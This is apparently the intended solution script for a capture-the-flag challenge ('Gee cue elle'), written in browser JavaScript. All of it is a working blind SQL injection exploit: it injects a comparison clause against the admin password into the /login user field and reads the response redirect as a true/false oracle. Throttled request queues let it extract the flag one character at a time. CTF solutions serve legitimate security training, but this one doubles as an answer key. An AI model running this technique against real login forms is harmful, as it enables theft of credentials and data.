A7 ~ Gee cue elle intended solution

solution.js

var HANDICAP = 10*2;
var reqs = [];
function fetchReq() {
  Promise.resolve().then(
    reqs.length?
    reqs.pop():
    _=>0
  ).then(
    _=>setTimeout(fetchReq, 1)
  );
}
fetchReq();
var errs = [];
function fetchErr() {
  Promise.resolve().then(
    errs.length?
    errs.pop():
    _=>0
  ).then(
    _=>setTimeout(fetchErr, 1 + 600e3/HANDICAP)
  );
}
var alphabet = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz{}'.split('');
async function query(username) {
  return new Promise((resolve, reject)=>{
    reqs.push(function() {
      return fetch(
        '/login',
        {
          method:'post',
          body:new Blob(
            ['password=&user='+encodeURI(username)],
            {type:'application/x-www-form-urlencoded'})
        }
      ).then(r=>resolve(!!r.url.match(/password/i))).catch(reject);
    });
  });
}
async function guess(prefix) {
   for (let o = 11, i = 11; i<alphabet.length; i+=--o) {
     if(await query(`admin' AND password < '${prefix}${alphabet[i]}`)) {
       for (let e = i-o; e < i; e++) {
         if(await query(`admin' AND password < '${prefix}${alphabet[e]}~`)) {
           return prefix + alphabet[e];
         }
       }
       console.log('wtf?');
     }
   }
   console.log('wtf!');
   throw new Error('wtf?!');
}
async function bruteforce(prefix) {
  return new Promise((resolve, reject)=>{
    errs.push(function() {
      return guess(prefix).then(resolve).catch(reject);
    });
  });
}
async function getFlag() {
  setTimeout(fetchErr, 10);
  var prefix = `CTF{${location.hostname.replace(/-.*/,'')}-`;
  for(let i=0;i<64;i++) {
    console.log(prefix = await bruteforce(prefix));
  }
}
query('fakeuser').then(getFlag).then(flag=>console.log(flag));